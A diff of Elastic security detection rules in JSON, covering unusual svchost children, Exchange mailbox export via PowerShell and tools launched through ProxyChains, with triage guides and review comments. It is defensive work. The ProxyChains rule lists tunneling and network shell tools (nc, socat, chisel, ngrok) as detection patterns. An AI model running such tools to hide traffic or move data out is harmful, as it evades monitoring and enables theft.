\"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_?????\\\\lib\\\\lexexe.exe\"\n ) and process.parent.args 
: \"imgsvc\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + 
} + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json new file mode 100644 index 00000000000..77e7f6688a5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual child processes of Service Host (svchost.exe) that traditionally do not spawn any child processes. This may indicate a code injection or an equivalent form of exploitation.", + "false_positives": [ + "Changes to Windows services or a rarely executed child process." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Service Host Child Process - Childless Service", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n process.parent.args : (\n \"WdiSystemHost\", \"LicenseManager\", \"StorSvc\", \"CDPSvc\", \"cdbhsvc\", \"BthAvctpSvc\", \"SstpSvc\", \"WdiServiceHost\",\n \"imgsvc\", \"TrkWks\", \"WpnService\", \"IKEEXT\", \"PolicyAgent\", \"CryptSvc\", \"netprofm\", \"ProfSvc\", \"StateRepository\",\n \"camsvc\", \"LanmanWorkstation\", \"NlaSvc\", \"EventLog\", \"hidserv\", \"DisplayEnhancementService\", \"ShellHWDetection\",\n \"AppHostSvc\", \"fhsvc\", \"CscService\", \"PushToInstall\"\n ) and\n\n /* unknown FPs can be added here */\n not process.name : (\"WerFault.exe\", \"WerFaultSecure.exe\", \"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (\n process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and\n process.parent.args : \"WdiServiceHost\"\n ) and\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_?????\\\\lib\\\\lexexe.exe\"\n ) and 
process.parent.args : \"imgsvc\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": 
"https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json new file mode 100644 index 00000000000..9742a8a9d15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_110.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Exporting Exchange Mailbox via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.command_line : (\"*MailboxExportRequest*\", \"*-Mailbox*-ContentFilter*\")\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, 
+ { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": 
"Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "6aace640-e631-4870-ba8e-5fdda09325db_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json new file mode 100644 index 00000000000..5f30fbc40d6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6aace640-e631-4870-ba8e-5fdda09325db_111.json 
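Review bot: The `query` pattern `"*MailboxExportRequest*"` also matches the `Get-MailboxExportRequest` and `Remove-MailboxExportRequest` cmdlets that this rule's own `note` tells the analyst to run during triage and remediation, so following the guide will generate further alerts from the responder's account; the "False positive analysis" section should say so, e.g. `- Running \`Get-MailboxExportRequest\` or \`Remove-MailboxExportRequest\` during triage also matches this rule's \`*MailboxExportRequest*\` pattern; expect follow-up alerts attributed to the responding account.` The `index` list covers `winlogbeat-*`, `logs-windows.*` and `logs-system.security*` while `tags` only names the Elastic Endgame and Elastic Defend data sources, so the tag set under-describes where the rule reads from. The same two points apply to the `_111.json` file in the next hunk, which differs from this one only in the endpoint index pattern.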
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information.", + "false_positives": [ + "Legitimate exchange system administration activity." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Exporting Exchange Mailbox via PowerShell", + "note": "## Triage and analysis\n\n### Investigating Exporting Exchange Mailbox via PowerShell\n\nEmail mailboxes and their information can be valuable assets for attackers. Company mailboxes often contain sensitive information such as login credentials, intellectual property, financial data, and personal information, making them high-value targets for malicious actors.\n\nThe `New-MailBoxExportRequest` cmdlet is used to begin the process of exporting contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange.\n\nAttackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the export operation:\n - Identify the user account that performed the action and whether it should perform this kind of action.\n - Contact the account owner and confirm whether they are aware of this activity.\n - Check if this operation was approved and performed according to the organization's change management policy.\n - Retrieve the operation status and use the `Get-MailboxExportRequest` cmdlet to review previous requests.\n - By default, no group in Exchange has the privilege to import or export mailboxes. Investigate administrators that assigned the \"Mailbox Import Export\" privilege for abnormal activity.\n- Investigate if there is a significant quantity of export requests in the alert timeframe. This operation is done on a per-mailbox basis and can be part of a mass export.\n- If the operation was completed successfully:\n - Check if the file is on the path specified in the command.\n - Investigate if the file was compressed, archived, or retrieved by the attacker for exfiltration.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity and it is done with proper approval.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the involved host is not the Exchange server, isolate the host to prevent further post-compromise behavior.\n- Use the `Remove-MailboxExportRequest` cmdlet to remove fully or partially completed export requests.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges of users with the \"Mailbox Import Export\" privilege to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name: (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and \n process.command_line : (\"*MailboxExportRequest*\", \"*-Mailbox*-ContentFilter*\")\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-mailboxexportrequest?view=exchange-ps" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, 
+ { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6aace640-e631-4870-ba8e-5fdda09325db", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1005", + "name": "Data from Local System", + "reference": "https://attack.mitre.org/techniques/T1005/" + }, + { + "id": "T1114", + "name": "Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/", + "subtechnique": [ + { + "id": "T1114.002", + "name": "Remote Email Collection", + "reference": "https://attack.mitre.org/techniques/T1114/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": 
"Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "6aace640-e631-4870-ba8e-5fdda09325db_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json new file mode 100644 index 00000000000..f3b965e1f9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5.json 
@@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Utility Launched via ProxyChains", + "note": "## Triage and analysis\n\n### Investigating Suspicious Utility Launched via ProxyChains\n\nAttackers can leverage `proxychains` to obfuscate their origin and bypass network defenses by routing their malicious traffic through multiple intermediary servers.\n\nThis rule looks for a list of suspicious processes spawned through `proxychains` by analyzing process command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate network obfuscation. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Linux Tunneling and/or Port Forwarding - 6ee947e9-de7e-4281-a55d-09289bdf947e\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses this utility for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and\nevent.type == \"start\" and process.name == \"proxychains\" and process.args : (\n \"ssh\", \"sshd\", \"sshuttle\", \"socat\", \"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\",\n \"ssf\", \"3proxy\", \"ngrok\", \"gost\", \"pivotnacci\", \"chisel*\", \"nmap\", \"ping\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\", \"ftp\", \"curl\", \"wget\"\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "6ace94ba-f02c-4d55-9f53-87d99b6f9af4_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json new file mode 100644 index 00000000000..b94bc1c8ea4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ace94ba-f02c-4d55-9f53-87d99b6f9af4_6.json 
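Review bot: The `process.args` list in `query` contains `"telnet"` twice (once after `"ncat"` and again after `"java"`); the duplicate is harmless to EQL but suggests the list was assembled by hand and should be deduplicated. The `process.name == "proxychains"` equality check only matches that exact binary name; the proxychains-ng package installs its executable as `proxychains4` on Debian-derived distributions, so a defensible coverage widening is `process.name in ("proxychains", "proxychains4")`, confirmed against the related "ProxyChains Activity" rule so the two stay consistent. The `setup` text opens with "This rule requires data coming in from Elastic Defend", yet `index` and `tags` also cover `auditbeat-*` and Auditd Manager; a sentence noting that those sources are also accepted would keep the setup guide in line with the index list.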
